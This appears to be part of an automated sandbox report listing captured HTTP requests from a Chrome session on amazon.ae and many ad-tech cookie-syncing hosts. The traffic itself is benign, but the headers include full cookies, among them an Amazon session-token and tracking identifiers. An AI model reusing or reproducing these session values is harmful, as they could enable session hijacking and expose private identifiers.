"Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /pixel?google_nid=medr&google_cm&key=GOO&process_consent=T&action=GET_ID&opid=goo&etid=&domid=1106&ops=apx HTTP/1.1Host: cm.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
    Source: global trafficHTTP traffic detected: GET /s/ecm3?ex=audex.com&id=55baee24-b702-4cc6-ad0d-99fabac100f1 HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-id=A94x7cOy0E6VmJKhhQVGd4s; ad-privacy=0
    Source: global trafficHTTP traffic detected: GET /s/ecm3?ex=weborama&id=WXh3V2VuazBQcWZGQUE2V1g5c2ouZQ HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-id=A94x7cOy0E6VmJKhhQVGd4s; ad-privacy=0
    Source: global trafficHTTP traffic detected: GET /s/ecm3?ex=weborama&id=WXh3V2VuazBQcWZGQUE2V1g5c2ouZQ HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-id=A94x7cOy0E6VmJKhhQVGd4s; ad-privacy=0
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26ctb%3D1%26m%3D1%26sc%3DB82A0YC1SM3B4A82DCGS%26pc%3D4280%26at%3D4280%26t%3D1723729112260%26csmtags%3Dcsm-feature-touch-enabled%3Afalse%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DB82A0YC1SM3B4A82DCGS%26aftb%3D1%26lob%3D1:4280 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /1/events/com.amazon.eel.SearchAutocompleteUIServiceMetrics.nexus HTTP/1.1Host: unagi.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /s/ecm3?ex=bluekai.com&id=$_BK_UUID HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-id=A94x7cOy0E6VmJKhhQVGd4s; ad-privacy=0
    Source: global trafficHTTP traffic detected: GET /sync/put/amazon?amazonid=55baee24-b702-4cc6-ad0d-99fabac100f1&redir=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Daudex.com%26id%3D55baee24-b702-4cc6-ad0d-99fabac100f1 HTTP/1.1Host: audex.userreport.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __bpn_uid=b316a4f8-0c6e-42b5-8a26-b7d7cccf4c2e; __ur_dc=1723729115688; __bpn_puid=5ec5caf5-e5dd-448b-820f-47d5a6b2d5e5
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26m%3D1%26sc%3Dcsa%3AendVL%26pc%3D5787%26at%3D5787%26t%3D1723729113767%26csmtags%3DendVL%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DB82A0YC1SM3B4A82DCGS%26aftb%3D1%26lob%3D1:5786 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /map?dsp_id=12&uid=GEhP5JvVQHm1RDQkIlBf8Q&gdpr_consent= HTTP/1.1Host: sync.rfp.fout.jpConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /dspreply?dspId=1868&dspUserId=bYUuYICqQsKknbsvLmRwgg&redir=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3DdailymotionHMT2&id=&gdpr_consent= HTTP/1.1Host: public-prod-dspcookiematching.dmxleo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61YiGh5SWaL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /s/ecm3?ex=doubleclick.net&gdpr_consent=&google_gid=CAESEH55Ky7wK_k81O16lJCeLKM&google_cver=1 HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-id=A94x7cOy0E6VmJKhhQVGd4s; ad-privacy=0
    Source: global trafficHTTP traffic detected: GET /images/I/71KCNSueOqL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /s/ecm3?ex=adform.net&id=8267749363954260608 HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-id=A94x7cOy0E6VmJKhhQVGd4s; ad-privacy=0
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26m%3D1%26sc%3Dcsa%3Asi%26si%3D946%26pc%3D5787%26at%3D5787%26t%3D1723729113767%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DB82A0YC1SM3B4A82DCGS%26aftb%3D1%26lob%3D1:5787 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3Asi%26si%3D3525%26pc%3D15082%26at%3D15082%26t%3D1723729109596%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:15082 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26m%3D1%26sc%3Dcsa%3Aatfsi%26atfsi%3D946%26pc%3D5788%26at%3D5788%26t%3D1723729113768%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DB82A0YC1SM3B4A82DCGS%26aftb%3D1%26lob%3D1:5787 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3AendVL%26pc%3D15082%26at%3D15082%26t%3D1723729109596%26csmtags%3DendVL%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:15082 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /rd/uedata?at&v=0.295223.0&id=B82A0YC1SM3B4A82DCGS&ctb=1&m=1&sc=B82A0YC1SM3B4A82DCGS&pc=4280&at=4280&t=1723729112260&csmtags=csm-feature-touch-enabled:false&pty=i18n-preferences-web&spty=subSelectPreferences&pti=undefined&tid=B82A0YC1SM3B4A82DCGS&aftb=1&lob=1 HTTP/1.1Host: www.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY; csm-hit=tb:B82A0YC1SM3B4A82DCGS+s-B82A0YC1SM3B4A82DCGS|1723729115182&t:1723729115182&adb:adblk_no
    Source: global trafficHTTP traffic detected: GET /rd/uedata?at&v=0.295223.0&id=B82A0YC1SM3B4A82DCGS&ctb=1&m=1&sc=B82A0YC1SM3B4A82DCGS&pc=4285&at=4285&t=1723729112265&pty=i18n-preferences-web&spty=subSelectPreferences&pti=undefined&tid=B82A0YC1SM3B4A82DCGS&aftb=1&ui=2&lob=1 HTTP/1.1Host: www.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY; csm-hit=tb:B82A0YC1SM3B4A82DCGS+s-B82A0YC1SM3B4A82DCGS|1723729115182&t:1723729115182&adb:adblk_no
    Source: global trafficHTTP traffic detected: GET /images/I/61xur6u9CKL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/81T0Bvf7SSL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /w/1.0/cm?id=e818ca1e-0c23-caa8-0dd3-096b0ada08b7&r=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Dopenx.com%26id%3D%7BOPENX_ID%7D&gdpr_consent= HTTP/1.1Host: us-u.openx.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /usermatchredir?s=184155&cb=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Dindex%26id%3D__UID__ HTTP/1.1Host: ssum-sec.casalemedia.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CMID=Zr4E20t3ua0AAHMyAbC.vgAA; CMPS=1241; CMPRO=1241
